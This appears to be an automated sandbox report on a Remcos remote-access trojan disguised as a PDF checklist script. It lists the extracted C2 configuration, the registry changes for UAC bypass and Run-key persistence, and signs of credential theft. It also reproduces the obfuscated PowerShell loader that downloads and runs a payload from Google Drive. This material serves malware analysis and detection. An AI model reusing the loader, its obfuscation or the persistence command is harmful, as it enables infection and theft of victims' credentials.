remcos | c985838da01a3503762139ed46c050f93b1eb4a2c803ba82f081f382a4a3f2ef

Analysis

max time kernel
300s
max time network
290s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
06/11/2024, 09:51

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

rA01_278 Check list·pdf.vbs
Size

14KB
MD5

9becd037359f4e017d31dc8ec143ec55
SHA1

dd98bea234f0b59af645b1a78ee2ca201ad7f1f5
SHA256

bec952140d46bb6b997483d3f1aba4228d80a943c1a956568754231ff3e668ee
SHA512

b49ee61f497b0a88f5c182ed97bc5db0da64a04f7154f7aa81be077bbaed7f949fabf02a751da51bd12f600600c622078cfa03c7353bf8fe3e32d71751aa44ea
SSDEEP

192:QbbM68CG8YWX/+mg0Q9bSu5C1YhhzbmpGSvEX1Dks6Dz4CrZQI57b/25vGFMjw7y:Yb05MFJ/FsQPHoimJHFcMcA

Score

10^/10

remcos remotehost collection credential_access discovery evasion execution persistence rat stealer trojan

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

a458386d9.duckdns.org:3256

Attributes

audio_folder
MicRecords
audio_path
ApplicationPath
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
true
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-4EN793
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Remcos family
remcos

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Detected Nirsoft tools 3 IoCs

Free utilities often used by attackers which can steal passwords, product keys, etc.

resource	yara_rule
behavioral2/memory/3880-190-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral2/memory/2784-189-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft
behavioral2/memory/852-193-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft

NirSoft MailPassView 1 IoCs

Password recovery tool for various email clients

resource	yara_rule
behavioral2/memory/2784-189-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 1 IoCs

Password recovery tool for various web browsers

resource	yara_rule
behavioral2/memory/3880-190-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Blocklisted process makes network request 13 IoCs

flow	pid	Process
2	780	WScript.exe
7	4752	powershell.exe
9	4752	powershell.exe
35	2276	msiexec.exe
37	2276	msiexec.exe
39	2276	msiexec.exe
41	2276	msiexec.exe
43	2276	msiexec.exe
57	2276	msiexec.exe
59	2276	msiexec.exe
60	2276	msiexec.exe
61	2276	msiexec.exe
63	2276	msiexec.exe

Uses browser remote debugging 2 TTPs 9 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

credential_access stealer

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

pid	Process
3212	Chrome.exe
4804	msedge.exe
5004	msedge.exe
4576	msedge.exe
1696	Chrome.exe
4496	Chrome.exe
4560	msedge.exe
2068	Chrome.exe
4984	msedge.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	WScript.exe

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	msiexec.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Startup key = "%Staalwiren205% -windowstyle 1 $Preally=(gp -Path 'HKCU:\\Software\\Gothonic\\').priceite;%Staalwiren205% ($Preally)"	reg.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4752	powershell.exe
4344	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
7	drive.google.com
35	drive.google.com
6	drive.google.com

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
2276	msiexec.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
4344	powershell.exe
2276	msiexec.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 2276 set thread context of 3880	2276	msiexec.exe	123
PID 2276 set thread context of 2784	2276	msiexec.exe	124
PID 2276 set thread context of 852	2276	msiexec.exe	127

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	Chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry

T1112

pid	Process
1396	reg.exe
2392	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4752	powershell.exe
4752	powershell.exe
4344	powershell.exe
4344	powershell.exe
4344	powershell.exe
2276	msiexec.exe
2276	msiexec.exe
2276	msiexec.exe
2276	msiexec.exe
2276	msiexec.exe
2276	msiexec.exe
2276	msiexec.exe
2276	msiexec.exe
2276	msiexec.exe
2276	msiexec.exe
2276	msiexec.exe
2276	msiexec.exe
2276	msiexec.exe
2276	msiexec.exe
2276	msiexec.exe
2276	msiexec.exe
2276	msiexec.exe
2276	msiexec.exe
2276	msiexec.exe
2276	msiexec.exe
2276	msiexec.exe
2276	msiexec.exe
2276	msiexec.exe
2276	msiexec.exe
2276	msiexec.exe
2276	msiexec.exe
2276	msiexec.exe
2276	msiexec.exe
2276	msiexec.exe
2276	msiexec.exe
2276	msiexec.exe
2276	msiexec.exe
2276	msiexec.exe
2276	msiexec.exe
2276	msiexec.exe
2276	msiexec.exe
2068	Chrome.exe
2068	Chrome.exe
2276	msiexec.exe
2276	msiexec.exe
2276	msiexec.exe
2276	msiexec.exe
2276	msiexec.exe
2276	msiexec.exe
2276	msiexec.exe
2276	msiexec.exe
2276	msiexec.exe
2276	msiexec.exe
3880	msiexec.exe
3880	msiexec.exe
2276	msiexec.exe
2276	msiexec.exe
852	msiexec.exe
852	msiexec.exe
2276	msiexec.exe
2276	msiexec.exe
2276	msiexec.exe
2276	msiexec.exe
2276	msiexec.exe

Suspicious behavior: MapViewOfSection 6 IoCs

pid	Process
4344	powershell.exe
2276	msiexec.exe
2276	msiexec.exe
2276	msiexec.exe
2276	msiexec.exe
2276	msiexec.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs

pid	Process
4984	msedge.exe
4984	msedge.exe
4984	msedge.exe
4984	msedge.exe

Suspicious use of AdjustPrivilegeToken 17 IoCs

description	pid	Process
Token: SeDebugPrivilege	4752	powershell.exe
Token: SeDebugPrivilege	4344	powershell.exe
Token: SeDebugPrivilege	852	msiexec.exe
Token: SeShutdownPrivilege	2068	Chrome.exe
Token: SeCreatePagefilePrivilege	2068	Chrome.exe
Token: SeShutdownPrivilege	2068	Chrome.exe
Token: SeCreatePagefilePrivilege	2068	Chrome.exe
Token: SeShutdownPrivilege	2068	Chrome.exe
Token: SeCreatePagefilePrivilege	2068	Chrome.exe
Token: SeShutdownPrivilege	2068	Chrome.exe
Token: SeCreatePagefilePrivilege	2068	Chrome.exe
Token: SeShutdownPrivilege	2068	Chrome.exe
Token: SeCreatePagefilePrivilege	2068	Chrome.exe
Token: SeShutdownPrivilege	2068	Chrome.exe
Token: SeCreatePagefilePrivilege	2068	Chrome.exe
Token: SeShutdownPrivilege	2068	Chrome.exe
Token: SeCreatePagefilePrivilege	2068	Chrome.exe

Suspicious use of FindShellTrayWindow 3 IoCs

pid	Process
2068	Chrome.exe
4984	msedge.exe
4984	msedge.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2276	msiexec.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 780 wrote to memory of 4752	780	WScript.exe	84
PID 780 wrote to memory of 4752	780	WScript.exe	84
PID 4344 wrote to memory of 2276	4344	powershell.exe	101
PID 4344 wrote to memory of 2276	4344	powershell.exe	101
PID 4344 wrote to memory of 2276	4344	powershell.exe	101
PID 4344 wrote to memory of 2276	4344	powershell.exe	101
PID 2276 wrote to memory of 3104	2276	msiexec.exe	102
PID 2276 wrote to memory of 3104	2276	msiexec.exe	102
PID 2276 wrote to memory of 3104	2276	msiexec.exe	102
PID 3104 wrote to memory of 1396	3104	cmd.exe	105
PID 3104 wrote to memory of 1396	3104	cmd.exe	105
PID 3104 wrote to memory of 1396	3104	cmd.exe	105
PID 2276 wrote to memory of 3404	2276	msiexec.exe	110
PID 2276 wrote to memory of 3404	2276	msiexec.exe	110
PID 2276 wrote to memory of 3404	2276	msiexec.exe	110
PID 3404 wrote to memory of 2392	3404	cmd.exe	112
PID 3404 wrote to memory of 2392	3404	cmd.exe	112
PID 3404 wrote to memory of 2392	3404	cmd.exe	112
PID 2276 wrote to memory of 2068	2276	msiexec.exe	114
PID 2276 wrote to memory of 2068	2276	msiexec.exe	114
PID 2068 wrote to memory of 4380	2068	Chrome.exe	115
PID 2068 wrote to memory of 4380	2068	Chrome.exe	115
PID 2068 wrote to memory of 1476	2068	Chrome.exe	116
PID 2068 wrote to memory of 1476	2068	Chrome.exe	116
PID 2068 wrote to memory of 1476	2068	Chrome.exe	116
PID 2068 wrote to memory of 1476	2068	Chrome.exe	116
PID 2068 wrote to memory of 1476	2068	Chrome.exe	116
PID 2068 wrote to memory of 1476	2068	Chrome.exe	116
PID 2068 wrote to memory of 1476	2068	Chrome.exe	116
PID 2068 wrote to memory of 1476	2068	Chrome.exe	116
PID 2068 wrote to memory of 1476	2068	Chrome.exe	116
PID 2068 wrote to memory of 1476	2068	Chrome.exe	116
PID 2068 wrote to memory of 1476	2068	Chrome.exe	116
PID 2068 wrote to memory of 1476	2068	Chrome.exe	116
PID 2068 wrote to memory of 1476	2068	Chrome.exe	116
PID 2068 wrote to memory of 1476	2068	Chrome.exe	116
PID 2068 wrote to memory of 1476	2068	Chrome.exe	116
PID 2068 wrote to memory of 1476	2068	Chrome.exe	116
PID 2068 wrote to memory of 1476	2068	Chrome.exe	116
PID 2068 wrote to memory of 1476	2068	Chrome.exe	116
PID 2068 wrote to memory of 1476	2068	Chrome.exe	116
PID 2068 wrote to memory of 1476	2068	Chrome.exe	116
PID 2068 wrote to memory of 1476	2068	Chrome.exe	116
PID 2068 wrote to memory of 1476	2068	Chrome.exe	116
PID 2068 wrote to memory of 1476	2068	Chrome.exe	116
PID 2068 wrote to memory of 1476	2068	Chrome.exe	116
PID 2068 wrote to memory of 1476	2068	Chrome.exe	116
PID 2068 wrote to memory of 1476	2068	Chrome.exe	116
PID 2068 wrote to memory of 1476	2068	Chrome.exe	116
PID 2068 wrote to memory of 1476	2068	Chrome.exe	116
PID 2068 wrote to memory of 1476	2068	Chrome.exe	116
PID 2068 wrote to memory of 1476	2068	Chrome.exe	116
PID 2068 wrote to memory of 1612	2068	Chrome.exe	117
PID 2068 wrote to memory of 1612	2068	Chrome.exe	117
PID 2068 wrote to memory of 2516	2068	Chrome.exe	118
PID 2068 wrote to memory of 2516	2068	Chrome.exe	118
PID 2068 wrote to memory of 2516	2068	Chrome.exe	118
PID 2068 wrote to memory of 2516	2068	Chrome.exe	118
PID 2068 wrote to memory of 2516	2068	Chrome.exe	118
PID 2068 wrote to memory of 2516	2068	Chrome.exe	118
PID 2068 wrote to memory of 2516	2068	Chrome.exe	118
PID 2068 wrote to memory of 2516	2068	Chrome.exe	118
PID 2068 wrote to memory of 2516	2068	Chrome.exe	118
PID 2068 wrote to memory of 2516	2068	Chrome.exe	118

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\rA01_278 Check list·pdf.vbs"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:780
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#thripple Dolkene Phrontisterion Individualising #>;$Dukken='shellburst';<#Anticreeper Tibiotarsus Pastos Broderings Lftendes #>; function Pickleworm($Naa){If ($host.DebuggerEnabled) {$Haandvaskens++;}$Smaabilledkameraets=$Rettersteds+$Naa.'Length' - $Haandvaskens; for ( $Molmen=4;$Molmen -lt $Smaabilledkameraets;$Molmen+=5){$Naablsende=$Molmen;$Republikanere228+=$Naa[$Molmen];}$Republikanere228;}function Prostern($Afhudning){ & ($Anteroflexion) ($Afhudning);}$Byggelov=Pickleworm 'SamlMUnbooTilezHveri Ti,lBlunlTr naAl m/Thia ';$Udrykningshornet=Pickleworm ' PauTP qulTragsOutf1Fort2Inds ';$Amiantus='St r[Retsn lueHa vTSejl.O.dksSiliEDa nRGenevAltaI Ln.cR lleKindP Sp.oAwkwIKarrN Quit Tr,m La aEuchn ,aiaAab.gBlodELemnRSmig]Cord:Bynk: TemSRev eDitlcurbaU uguRBurgIOrsoTIndkYaithPFrugrnappo culTParkOA.giCOpdro,gleLLamp=S.mm$ D.sULamaDNi,prEnemYs rukForgnwilliVa,iNimpeGKiwisPrisHChriOEn eRDiffNtaareTuskTLtap ';$Byggelov+=Pickleworm ' Hu 5 loo. duw0 Str Pa (SaltWAl ui St,nAntid InfoMennw Jo sIn e FariNtaylT orb Anm1Afko0Gall.i,oi0Sept;P,le ,akWSpodiE wan San6Viss4.nde;Mach Jurax ag6Kirs4kryd;Hj m Odd r .fsvPe,s: Chr1Nedb3alle1Angs.dist0Buel) ora Hy sGForseBe.ecFo ek Tobo Gor/Dext2Gen 0 Sli1.nci0 Sae0Fejl1Guet0 Unc1 R n Ha FKys iSprerSt eeOedofKonfoSidexCitr/Ante1R ce3 Pru1Acce.Be.l0 Lep ';$sadelmageren=Pickleworm ' ggluBerrSRenseSu drS ra-StamASaltgKeeceAngoN BzeTBlac ';$lovgivningsomraaderne=Pickleworm 'Anfohdeh t GattP.anpra esOpt.:Drue/Uset/Sup.dFornrKrigiKmpevCenteCyma.P plgPruno SavoBastgKopslT.ltePo,i. Va cOmnioDentmStor/ benustylc fde?JoureBambxF brp CosoByporMytht Out=towndExceoInitwBradn ivelBigaoT.lkaD scd Vac&EffoiKegld Spr=Kntr1 Ae,zBesks AmusSubaPcruePS veLMngeiTawp7 bal1StreSPappsPhosDOxyrdUnreWAfteXContJFu.dLJohaMVilli IscUB oh8indlq Affh koeLEr oW CutXS,vaZAbonsAktiSPol bDicabPegafP,on ';$Skaltendes=Pickleworm 'L.de> S.a ';$Anteroflexion=Pickleworm 'sligiHisteRichXUdsv ';$Stangspringerens='Forholdsmssige252';$Symboliseredes='\Lhund.Sty';Prostern (Pickleworm 'Tota$IntogI ollFo.tOD scbPhoeA TumlPo i: FecBHundA FutgSt me SlyN SkiDMars=Wor $ Cdre arlNAu ev Non:R.gsA rkePP omp oppdProka .opTSylfAForn+Fysi$PastsUdply ensmS,ndb TrooInsklpredI Ar.S ateE,fskrNitrESva DT reE RepSPomp ');Prostern (Pickleworm 'Int,$BenzGMi tlUnorofosfBTechAUnddL G.o:Bl dSElekuQuinB priMDebieH orN Ko IPersnRverGG nteO sha rveL as=Lace$SkaklAflaoBugsv CymgKon iFundVEmbenTr aI ultNArmegP keS ogOKontmLasirPl taG maABonndMonoECirkr,ipsNBeateAuto.CastS Chlptab LNin I.opgtGrei(Tilh$Tel s HomK erfAPrveL Gr TSelvE vejn ,esDUndeeKil,srill)Di k ');Prostern (Pickleworm $Amiantus);$lovgivningsomraaderne=$Submeningeal[0];$Effortfully=(Pickleworm 'Supe$ F.agGar.lSto O,ubtBTresAGaleLNedp:ExtrlFi,eiTripN NonD,inerGendiSyltn LalGMilk=omkoNTr cERhamwSt g-L bio oruBSerpJEldrePyntCDonoTImbl PolySPattYHogfS LyrtBlteEStimmg ls. ffaN uvEVigrt Gra.quinW HeeERestbS.vrCSirlLKommI T,sEAltmn Su tKoor ');Prostern ($Effortfully);Prostern (Pickleworm ' Hal$ At lFleriSkrenAvandNrherSkoriGourn c ng Hje.HippHBiebe VoyaUdgadDisce SchrMembsPo t[K or$O trsDep aSuffd L.we Pr l Dogm eboa malgKonteNo cr C ieStatnKon.]Fals=Unde$R baB Besy lygmanig.kolekolll ejoAgenvSnu ');$frastdte=Pickleworm 'Kvot$ Nodlrei iVansn rbldH.ddrEngaiDe,pn Mi,ga ti.AnhoDSurbo AarwSemin ConlS eroEnteaHalldD,flF Stji S,alAr ie Tdl(Brod$ Serl inso G dv uskgAnveiTanovHap nUndeireginb sngForhsScamo KirmTrekrFuldaTa oaDiscdBesmeTrepr eponDrevebuny,Well$BaroMSy soCordrSa.ttSautmB.jeaDetei Ig,nGejssN,xu)S ov ';$Mortmains=$Bagend;Prostern (Pickleworm ' Ch,$InduGPa,fLAus.O,clebOutdaEv lLAsy,:moulP BrsrUnree PetANondDIso vMgbeENed.R V,cTPidgeStatNAschC UnpY Mgl=s mk( steT HjgeVandSNephTKon,-AlaiP jkoAPostt okhHSym Val$How.mA too SkyrAvisTKrusmG.avA neeITra nFdsesKurs).air ');while (!$Preadvertency) {Prostern (Pickleworm 'Deku$AcasgVed.lSupeoK libSkndaU anl Ta :Co sN Pa oFlyvvUsureClunmRevalspgeoUndebAndraUndetEksaeSub =Bars$ PoltAf nrFiguu skie M g ') ;Prostern $frastdte;Prostern (Pickleworm 'WatesTrueTVrgeAFemiRLo,eTOutt-Class nusLTracESpyfeFa spFor Vaab4 Ban ');Prostern (Pickleworm 'Inst$justGF nhLMohooExtrBTje aE lalSpro:DingP PerRRoofe Ad.ASemiDpla vAmanE arkrFlelt Si,ePostnBajac He YPort=funk(ViliT Flye R bSD arTStra-Is tPUn.iaFljatBranhFred B g$ AlcmS uloWe rR KomTR elMImpraPantiEp rN Unsssomm)Udd ') ;Prostern (Pickleworm 'Fors$Favog Genl onuoInt.BOcelATranlIndo:ReviLTegnAFishgs anKStilARamegBelaeCohonPers= Tan$benzG actlCoggo FlybHygrA ArrLEnk : RepFLinerRd ia N.tnunerk,esilHelmiUgenNRegniMyndzPictA yloTNoiliArrooUnddN ,ar+Crys+ ods%Svag$ AntsUnreuA lab SemMP nierib nFootIKan nXy iG MiseVranA B alPeti.Perlc SneO Et,UTillN rivTJogg ') ;$lovgivningsomraaderne=$Submeningeal[$Lagkagen];}$Theorises=318880;$Devil=30838;Prostern (Pickleworm 'Cryp$MawkGAnn.L,ivuoSnapBK,teA MarLAnve:Sp.nU ngrnTeg DFitmLTra BAlba Ov r=Isva MyngBissEBal TSeku-F.rbc anto K uNMotot ClyEPrednDispt lde M nu$Pat.M ThyoPattRLititSkamMSociARougi CheNna bs Pit ');Prostern (Pickleworm 'Tire$Phylg Sa l VejoPtysbEgepaMin,lN ve:KompWarveaPen,gAffonmepheBro rHjrniKattaRe,vnFla aSten Sta=C si Aars[Q avSUnmoyManis .vet.vere UbemTr v.ForaCChl.oArimnSte vOvereP eorBra tSmad]Unde:play: P oFRevirAgteoEyesm.isfB K ba .vesFrileFor 6Supr4MakeSSagstInkorBjrgiUntanSy,hgFlip(Elev$KillU utnBantdBortlBro bEtti)Mona ');Prostern (Pickleworm 'Pres$CockGNo,cLSkraO F rBpostaBasnLNo,f:Sau bLandAFernRY,msIpr sSInte Wenn=Rea Rinc[ResiSSkanySignS Ol Tde eePau,MFibr.He ttTeeuEPri.xskumtSyna.Supee Un nTiptcUnceoSi hDRidsI VagNIdnhGSwit]Scre:Ti b: NemAAalbSCla cyo siUdpriElec. dr gValgEIdeitSpresKjerT turRVen,I AntNGhaugGu s(Orig$PommWKeloaCantGHoplnVarsE MasrPel,ItoxiAN naN SpaA Wel)Oe e ');Prostern (Pickleworm 'Sco $Pen gF.rrlBangOAmbuB PeraCa cLBibe:ShoruRefrN NeuCFrafU anRUnclsInc I steN Anng.isk=,lip$NonrBPaciaTe.eR Ta.I .orS her.Rap STol,U AntB,ttrsLy,eTDisnRPaakIquinNSupeglort(Wa d$Gemmt ampHtyndERedioMildroppoi PlaSKittE TopsAfsk,Mpon$ShimdVirkeMateVSteniSeafL.kud) dib ');Prostern $uncursing;"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4752

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#thripple Dolkene Phrontisterion Individualising #>;$Dukken='shellburst';<#Anticreeper Tibiotarsus Pastos Broderings Lftendes #>; function Pickleworm($Naa){If ($host.DebuggerEnabled) {$Haandvaskens++;}$Smaabilledkameraets=$Rettersteds+$Naa.'Length' - $Haandvaskens; for ( $Molmen=4;$Molmen -lt $Smaabilledkameraets;$Molmen+=5){$Naablsende=$Molmen;$Republikanere228+=$Naa[$Molmen];}$Republikanere228;}function Prostern($Afhudning){ & ($Anteroflexion) ($Afhudning);}$Byggelov=Pickleworm 'SamlMUnbooTilezHveri Ti,lBlunlTr naAl m/Thia ';$Udrykningshornet=Pickleworm ' PauTP qulTragsOutf1Fort2Inds ';$Amiantus='St r[Retsn lueHa vTSejl.O.dksSiliEDa nRGenevAltaI Ln.cR lleKindP Sp.oAwkwIKarrN Quit Tr,m La aEuchn ,aiaAab.gBlodELemnRSmig]Cord:Bynk: TemSRev eDitlcurbaU uguRBurgIOrsoTIndkYaithPFrugrnappo culTParkOA.giCOpdro,gleLLamp=S.mm$ D.sULamaDNi,prEnemYs rukForgnwilliVa,iNimpeGKiwisPrisHChriOEn eRDiffNtaareTuskTLtap ';$Byggelov+=Pickleworm ' Hu 5 loo. duw0 Str Pa (SaltWAl ui St,nAntid InfoMennw Jo sIn e FariNtaylT orb Anm1Afko0Gall.i,oi0Sept;P,le ,akWSpodiE wan San6Viss4.nde;Mach Jurax ag6Kirs4kryd;Hj m Odd r .fsvPe,s: Chr1Nedb3alle1Angs.dist0Buel) ora Hy sGForseBe.ecFo ek Tobo Gor/Dext2Gen 0 Sli1.nci0 Sae0Fejl1Guet0 Unc1 R n Ha FKys iSprerSt eeOedofKonfoSidexCitr/Ante1R ce3 Pru1Acce.Be.l0 Lep ';$sadelmageren=Pickleworm ' ggluBerrSRenseSu drS ra-StamASaltgKeeceAngoN BzeTBlac ';$lovgivningsomraaderne=Pickleworm 'Anfohdeh t GattP.anpra esOpt.:Drue/Uset/Sup.dFornrKrigiKmpevCenteCyma.P plgPruno SavoBastgKopslT.ltePo,i. Va cOmnioDentmStor/ benustylc fde?JoureBambxF brp CosoByporMytht Out=towndExceoInitwBradn ivelBigaoT.lkaD scd Vac&EffoiKegld Spr=Kntr1 Ae,zBesks AmusSubaPcruePS veLMngeiTawp7 bal1StreSPappsPhosDOxyrdUnreWAfteXContJFu.dLJohaMVilli IscUB oh8indlq Affh koeLEr oW CutXS,vaZAbonsAktiSPol bDicabPegafP,on ';$Skaltendes=Pickleworm 'L.de> S.a ';$Anteroflexion=Pickleworm 'sligiHisteRichXUdsv ';$Stangspringerens='Forholdsmssige252';$Symboliseredes='\Lhund.Sty';Prostern (Pickleworm 'Tota$IntogI ollFo.tOD scbPhoeA TumlPo i: FecBHundA FutgSt me SlyN SkiDMars=Wor $ Cdre arlNAu ev Non:R.gsA rkePP omp oppdProka .opTSylfAForn+Fysi$PastsUdply ensmS,ndb TrooInsklpredI Ar.S ateE,fskrNitrESva DT reE RepSPomp ');Prostern (Pickleworm 'Int,$BenzGMi tlUnorofosfBTechAUnddL G.o:Bl dSElekuQuinB priMDebieH orN Ko IPersnRverGG nteO sha rveL as=Lace$SkaklAflaoBugsv CymgKon iFundVEmbenTr aI ultNArmegP keS ogOKontmLasirPl taG maABonndMonoECirkr,ipsNBeateAuto.CastS Chlptab LNin I.opgtGrei(Tilh$Tel s HomK erfAPrveL Gr TSelvE vejn ,esDUndeeKil,srill)Di k ');Prostern (Pickleworm $Amiantus);$lovgivningsomraaderne=$Submeningeal[0];$Effortfully=(Pickleworm 'Supe$ F.agGar.lSto O,ubtBTresAGaleLNedp:ExtrlFi,eiTripN NonD,inerGendiSyltn LalGMilk=omkoNTr cERhamwSt g-L bio oruBSerpJEldrePyntCDonoTImbl PolySPattYHogfS LyrtBlteEStimmg ls. ffaN uvEVigrt Gra.quinW HeeERestbS.vrCSirlLKommI T,sEAltmn Su tKoor ');Prostern ($Effortfully);Prostern (Pickleworm ' Hal$ At lFleriSkrenAvandNrherSkoriGourn c ng Hje.HippHBiebe VoyaUdgadDisce SchrMembsPo t[K or$O trsDep aSuffd L.we Pr l Dogm eboa malgKonteNo cr C ieStatnKon.]Fals=Unde$R baB Besy lygmanig.kolekolll ejoAgenvSnu ');$frastdte=Pickleworm 'Kvot$ Nodlrei iVansn rbldH.ddrEngaiDe,pn Mi,ga ti.AnhoDSurbo AarwSemin ConlS eroEnteaHalldD,flF Stji S,alAr ie Tdl(Brod$ Serl inso G dv uskgAnveiTanovHap nUndeireginb sngForhsScamo KirmTrekrFuldaTa oaDiscdBesmeTrepr eponDrevebuny,Well$BaroMSy soCordrSa.ttSautmB.jeaDetei Ig,nGejssN,xu)S ov ';$Mortmains=$Bagend;Prostern (Pickleworm ' Ch,$InduGPa,fLAus.O,clebOutdaEv lLAsy,:moulP BrsrUnree PetANondDIso vMgbeENed.R V,cTPidgeStatNAschC UnpY Mgl=s mk( steT HjgeVandSNephTKon,-AlaiP jkoAPostt okhHSym Val$How.mA too SkyrAvisTKrusmG.avA neeITra nFdsesKurs).air ');while (!$Preadvertency) {Prostern (Pickleworm 'Deku$AcasgVed.lSupeoK libSkndaU anl Ta :Co sN Pa oFlyvvUsureClunmRevalspgeoUndebAndraUndetEksaeSub =Bars$ PoltAf nrFiguu skie M g ') ;Prostern $frastdte;Prostern (Pickleworm 'WatesTrueTVrgeAFemiRLo,eTOutt-Class nusLTracESpyfeFa spFor Vaab4 Ban ');Prostern (Pickleworm 'Inst$justGF nhLMohooExtrBTje aE lalSpro:DingP PerRRoofe Ad.ASemiDpla vAmanE arkrFlelt Si,ePostnBajac He YPort=funk(ViliT Flye R bSD arTStra-Is tPUn.iaFljatBranhFred B g$ AlcmS uloWe rR KomTR elMImpraPantiEp rN Unsssomm)Udd ') ;Prostern (Pickleworm 'Fors$Favog Genl onuoInt.BOcelATranlIndo:ReviLTegnAFishgs anKStilARamegBelaeCohonPers= Tan$benzG actlCoggo FlybHygrA ArrLEnk : RepFLinerRd ia N.tnunerk,esilHelmiUgenNRegniMyndzPictA yloTNoiliArrooUnddN ,ar+Crys+ ods%Svag$ AntsUnreuA lab SemMP nierib nFootIKan nXy iG MiseVranA B alPeti.Perlc SneO Et,UTillN rivTJogg ') ;$lovgivningsomraaderne=$Submeningeal[$Lagkagen];}$Theorises=318880;$Devil=30838;Prostern (Pickleworm 'Cryp$MawkGAnn.L,ivuoSnapBK,teA MarLAnve:Sp.nU ngrnTeg 